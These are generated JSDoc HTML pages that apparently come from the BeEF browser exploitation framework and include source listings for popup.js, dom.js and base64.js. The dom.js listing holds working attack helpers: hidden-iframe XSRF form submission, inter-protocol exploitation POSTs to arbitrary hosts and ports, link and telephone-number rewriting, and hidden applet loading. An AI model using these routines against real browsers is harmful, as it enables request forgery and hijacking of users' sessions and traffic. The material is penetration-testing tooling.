<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_browser_jools.js.html">lib/browser_jools.js</a>, <a href="lib_browser_jools.js.html#line34">line 34</a>
</li></ul></dd>
</dl>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".Jools"><span class="type-signature">(static) </span>Jools<span class="signature">(rules)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Jools constructor.</p>
<p>A rule consists of:</p>
<ul>
<li>Descriptive name</li>
<li>One or more conditions</li>
<li>One or more consequences, which are fired when all conditions evaluate to true.</li>
</ul>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>rules</code></td>
<td class="type">
<span class="param-type">Object</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_browser_jools.js.html">lib/browser_jools.js</a>, <a href="lib_browser_jools.js.html#line394">line 394</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".module.exports.paramNames"><span class="type-signature">(static) </span>module.exports.paramNames<span class="signature">(f)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns an array of parameter names of the function f</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>f</code></td>
<td class="type">
<span class="param-type">function</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_browser_jools.js.html">lib/browser_jools.js</a>, <a href="lib_browser_jools.js.html#line453">line 453</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".module.exports.paramsToArguments"><span class="type-signature">(static) </span>module.exports.paramsToArguments<span class="signature">(obj, params)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Creates an array of arguments</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>obj</code></td>
<td class="type">
<span class="param-type">Object</span>
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>params</code></td>
<td class="type">
<span class="param-type">Array</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_browser_jools.js.html">lib/browser_jools.js</a>, <a href="lib_browser_jools.js.html#line471">line 471</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".normalizeArray"><span class="type-signature">(static) </span>normalizeArray<span class="signature">(parts, allowAboveRoot)</span><span class="type-signature"></span></h4>
<div class="description">
<p>resolves . and .. elements in a path array with directory names there
must be no slashes, empty elements, or device names (c:) in the array
(so also no leading and trailing slashes - it does not distinguish
relative and absolute paths)</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>parts</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>allowAboveRoot</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_browser_jools.js.html">lib/browser_jools.js</a>, <a href="lib_browser_jools.js.html#line242">line 242</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".require"><span class="type-signature">(static) </span>require<span class="signature">(file, cwd)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>file</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>cwd</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_browser_jools.js.html">lib/browser_jools.js</a>, <a href="lib_browser_jools.js.html#line10">line 10</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".require.alias"><span class="type-signature">(static) </span>require.alias<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_browser_jools.js.html">lib/browser_jools.js</a>, <a href="lib_browser_jools.js.html#line121">line 121</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".require.define"><span class="type-signature">(static) </span>require.define<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_browser_jools.js.html">lib/browser_jools.js</a>, <a href="lib_browser_jools.js.html#line152">line 152</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/browser_popup.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: browser/popup.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: browser/popup.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides fuctions for working with cookies.
* Several functions adopted from http://davidwalsh.name/popup-block-javascript
* Original author unknown.
* @namespace beef.browser.popup
*/
beef.browser.popup = {
/** @memberof beef.browser.popup */
blocker_enabled: function ()
{
screenParams = beef.hardware.getScreenSize();
var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
if (popUp == null || typeof(popUp)=='undefined') {
return true;
} else {
popUp.close();
return false;
}
}
};
beef.regCmp('beef.browser.popup');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/dom.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: dom.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: dom.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides functionality to manipulate the DOM.
* @namespace beef.dom
*/
beef.dom = {
/**
* Generates a random ID for HTML elements
* @param {String} prefix a custom prefix before the random id. defaults to "beef-"
* @return {String} generated id
*/
generateID: function(prefix) {
return ((prefix == null) ? 'beef-' : prefix)+Math.floor(Math.random()*99999);
},
/**
* Creates a new element but does not append it to the DOM.
* @param {String} type the name of the element.
* @param {Array} attributes the attributes of that element.
* @return {Array} the created element.
*/
createElement: function(type, attributes) {
var el = document.createElement(type);
for(index in attributes) {
if(typeof attributes[index] == 'string') {
el.setAttribute(index, attributes[index]);
}
}
return el;
},
/**
* Removes element from the DOM.
* @param {Object} el the target element to be removed.
*/
removeElement: function(el) {
if (!beef.dom.isDOMElement(el))
{
el = document.getElementById(el);
}
try {
el.parentNode.removeChild(el);
} catch (e) { }
},
/**
* Tests if the object is a DOM element.
* @param {Object} the DOM element.
* @return {boolean} true if the object is a DOM element.
*/
isDOMElement: function(obj) {
return (obj.nodeType) ? true : false;
},
/**
* Creates an invisible iframe on the hook browser's page.
* @return {array} the iframe.
*/
createInvisibleIframe: function() {
var iframe = this.createElement('iframe', {
width: '1px',
height: '1px',
style: 'visibility:hidden;'
});
document.body.appendChild(iframe);
return iframe;
},
/**
* Returns the highest current z-index
* @param {Boolean} whether to return an associative array with the height AND the ID of the element
* @return {Integer} Highest z-index in the DOM
* OR
* @return {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
*/
getHighestZindex: function(include_id) {
var highest = {'height':0, 'elem':''};
$j('*').each(function() {
var current_high = parseInt($j(this).css("zIndex"),10);
if (current_high > highest.height) {
highest.height = current_high;
highest.elem = $j(this).attr('id');
}
});
if (include_id) {
return highest;
} else {
return highest.height;
}
},
/**
* Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
* is assigned to created iframe tag's src attribute resulting in GET request to that URI.
* example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
* @param {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
* @param {Hash} params: list of params that will be sent in request.
* @param {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
* @param {Function} a callback function to fire once the iFrame has loaded
* @return {Object} the inserted iFrame
*
*/
createIframe: function(type, params, styles, onload) {
var css = {};
if (type == 'hidden') {
css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
} else if (type == 'fullscreen') {
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
$j('body').css({'padding':'0px', 'margin':'0px'});
} else {
css = styles;
$j('body').css({'padding':'0px', 'margin':'0px'});
}
var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
return iframe;
},
/**
* Load the link (href value) in an overlay foreground iFrame.
* The BeEF hook continues to run in background.
* NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
* Framebusting techniques, this will not work.
*/
persistentIframe: function(){
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
{
e.preventDefault();
beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = "no";
document.documentElement.style.overflow = 'hidden';
}
});
},
/**
* Load a full screen div that is black, or, transparent
* @param {Boolean} vis: whether or not you want the screen dimmer enabled or not
* @param {Hash} options: a collection of options to customise how the div is configured, as follows:
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
* // By default this is 70
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
* // By default this will use beef.dom.getHighestZindex to always go to the top
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
* // By default this is #000000
*/
grayOut: function(vis, options) {
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
},
/**
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
* or, re-writing a document this is useful.
*/
removeStylesheets: function() {
$j('link[rel=stylesheet]').remove();
$j('style').remove();
},
/**
* Create a form element with the specified parameters, appending it to the DOM if append == true
* @param {Hash} params: params to be applied to the form element
* @param {Boolean} append: automatically append the form to the body
* @return {Object} a form object
*/
createForm: function(params, append) {
var form = $j('<form></form>').attr(params);
if (append)
$j('body').append(form);
return form;
},
loadScript: function(url) {
var s = document.createElement('script');
s.type = 'text/javascript';
s.src = url;
$j('body').append(s);
},
/**
* Get the location of the current page.
* @return the location.
*/
getLocation: function() {
return document.location.href;
},
/**
* Get links of the current page.
* @return array of URLs.
*/
getLinks: function() {
var linksarray = [];
var links = document.links;
for(var i = 0; i<links.length; i++) {
linksarray = linksarray.concat(links[i].href)
};
return linksarray
},
/**
* Rewrites all links matched by selector to url, also rebinds the click method to simply return true
* @param {String} url: the url to be rewritten
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
*/
rewriteLinks: function(url, selector) {
var sel = (selector == null) ? 'a' : selector;
return $j(sel).each(function() {
if ($j(this).attr('href') != null)
{
$j(this).attr('href', url).click(function() { return true; });
}
}).length;
},
/**
* Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
* http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
* @param {String} url: the url to be rewritten
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
*/
rewriteLinksClickEvents: function(url, selector) {
var sel = (selector == null) ? 'a' : selector;
return $j(sel).each(function() {
if ($j(this).attr('href') != null)
{
$j(this).click(function() {this.href=url});
}
}).length;
},
/**
* Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
* @param {String} old_protocol: the old link protocol to be rewritten
* @param {String} new_protocol: the new link protocol to be written
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
*/
rewriteLinksProtocol: function(old_protocol, new_protocol, selector) {
var count = 0;
var re = new RegExp(old_protocol+"://", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, new_protocol+"://")).click(function() { return true; });
count++;
}
}
});
return count;
},
/**
* Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
* @param {String} new_number: the new link telephone number to be written
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
*/
rewriteTelLinks: function(new_number, selector) {
var count = 0;
var re = new RegExp("tel:/?/?.*", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
count++;
}
}
});
return count;
},
/**
* Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
* @param {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
* @return {String} the parameters as a string ready to append to applet/embed/object tags (ex.: <param name='abc' value='test' />).
*/
parseAppletParams: function(params){
var result = '';
for (i in params){
var param = params[i];
for(key in param){
result += "<param name='" + key + "' value='" + param[key] + "' />";
}
}
return result;
},
/**
* Attach an applet to the DOM, using the best approach for differet browsers (object/applet/embed).
* example usage in the code, using a JAR archive (recommended and faster):
* beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D.class', null, 'http://127.0.0.1:3000/ui/media/images/target.jar', [{'param1':'1', 'param2':'2'}]);
* example usage in the code, using codebase:
* beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D', 'http://127.0.0.1:3000/', null, null);
* @param {String} id: reference identifier to the applet.
* @param {String} code: name of the class to be loaded. For example, beef.class.
* @param {String} codebase: the URL of the codebase (usually used when loading a single class for an unsigned applet).
* @param {String} archive: the jar that contains the code.
* @param {String} params: an array of additional params that the applet except.
*/
attachApplet: function(id, name, code, codebase, archive, params) {
var content = null;
if (beef.browser.isIE()) {
content = "" + // the classid means 'use the latest JRE available to launch the applet'
"<object id='" + id + "'classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' " +
"height='0' width='0' name='" + name + "'> " +
"<param name='code' value='" + code + "' />";
if (codebase != null) {
content += "<param name='codebase' value='" + codebase + "' />"
}
if (archive != null){
content += "<param name='archive' value='" + archive + "' />";
}
if (params != null) {
content += beef.dom.parseAppletParams(params);
}
content += "</object>";
}
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
if (codebase != null) {
content = "" +
"<applet id='" + id + "' code='" + code + "' " +
"codebase='" + codebase + "' " +
"height='0' width='0' name='" + name + "'>";
} else {
content = "" +
"<applet id='" + id + "' code='" + code + "' " +
"archive='" + archive + "' " +
"height='0' width='0' name='" + name + "'>";
}
if (params != null) {
content += beef.dom.parseAppletParams(params);
}
content += "</applet>";
}
// For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
// if (beef.browser.isFF()) {
// if (codebase != null) {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' codebase='" + codebase + "' " +
// "height='0' width='0' name='" + name + "'>";
// } else {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' archive='" + archive + "' " +
// "height='0' width='0' name='" + name + "'>";
// }
//
// if (params != null) {
// content += beef.dom.parseAppletParams(params);
// }
// content += "</embed>";
// }
$j('body').append(content);
},
/**
* Given an id, remove the applet from the DOM.
* @param {String} id: reference identifier to the applet.
*/
detachApplet: function(id) {
$j('#' + id + '').detach();
},
/**
* Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
* @param {String} action: the form action attribute, where the request will be sent.
* @param {String} method: HTTP method, usually POST.
* @param {String} enctype: form encoding type
* @param {Array} inputs: an array of inputs to be added to the form (type, name, value).
* example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
*/
createIframeXsrfForm: function(action, method, enctype, inputs){
var iframeXsrf = beef.dom.createInvisibleIframe();
var formXsrf = document.createElement('form');
formXsrf.setAttribute('action', action);
formXsrf.setAttribute('method', method);
formXsrf.setAttribute('enctype', enctype);
var input = null;
for (i in inputs){
var attributes = inputs[i];
input = document.createElement('input');
for(key in attributes){
if (key == 'name' && attributes[key] == 'submit') {
// workaround for https://github.com/beefproject/beef/issues/1117
beef.debug("createIframeXsrfForm - warning: changed form input 'submit' to 'Submit'");
input.setAttribute('Submit', attributes[key]);
} else {
input.setAttribute(key, attributes[key]);
}
}
formXsrf.appendChild(input);
}
iframeXsrf.contentWindow.document.body.appendChild(formXsrf);
formXsrf.submit();
return iframeXsrf;
},
/**
* Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
* @param {String} rhost: remote host ip/domain
* @param {String} rport: remote port
* @param {String} commands: protocol commands to be executed by the remote host:port service
*/
createIframeIpecForm: function(rhost, rport, path, commands){
var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data');
input = document.createElement('textarea');
input.setAttribute('name', Math.random().toString(36).substring(5));
input.value = commands;
formIpec.appendChild(input);
iframeIpec.contentWindow.document.body.appendChild(formIpec);
formIpec.submit();
return iframeIpec;
}
};
beef.regCmp('beef.dom');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/encode_base64.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: encode/base64.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: encode/base64.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
beef.encode = {};
/**
* Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
* @namespace beef.encode.base64
*/
beef.encode.base64 = {
keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
/**
* @memberof beef.encode.base64
* @param {string} input
* @return {string}
*/
encode : function (input) {
if (window.btoa) {
return btoa(unescape(encodeURIComponent(input)));
}
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
input = beef.encode.base64.utf8_encode(input);
while (i < input.length) {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this.keyStr.charAt(enc1) + this.keyStr.charAt(enc2) +
this.keyStr.charAt(enc3) + this.keyStr.charAt(enc4);
}
return output;
},
/**
* @memberof beef.encode.base64
* @param {string} input
* @return {string}
*/
decode : function (input) {
if (window.atob) {
return escape(atob(input));
}
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
while (i < input.length) {
enc1 = this.keyStr.indexOf(input.charAt(i++));
enc2 = this.keyStr.indexOf(input.charAt(i++));
enc3 = this.keyStr.indexOf(input.charAt(i++));
enc4 = this.keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = beef.encode.base64.utf8_decode(output);
return output;
},
/**
* @memberof beef.encode.base64
* @param {string} string
* @return {string}
*/
utf8_encode : function (string) {
string = string.replace(/\r\n/g,"\n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c);
}
else if((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
}
else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}
}
return utftext;
},
/**
* @memberof beef.encode.base64
* @param {string} utftext
* @return {string}
*/
utf8_decode : function (utftext) {
var string = "";
var i = 0;
var c = c1 = c2 = 0;
while ( i < utftext.length ) {
c = utftext.charCodeAt(i);
if (c < 128) {
string += String.fromCharCode(c);
i++;
}
else if((c > 191) && (c < 224)) {
c2 = utftext.charCodeAt(i+1);
string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
i += 2;
}
else {
c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2);
string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3;
}
}
return string;
}
};
beef.regCmp('beef.encode.base64');
</code></pre>
</article>
</section>
</div>
<nav>
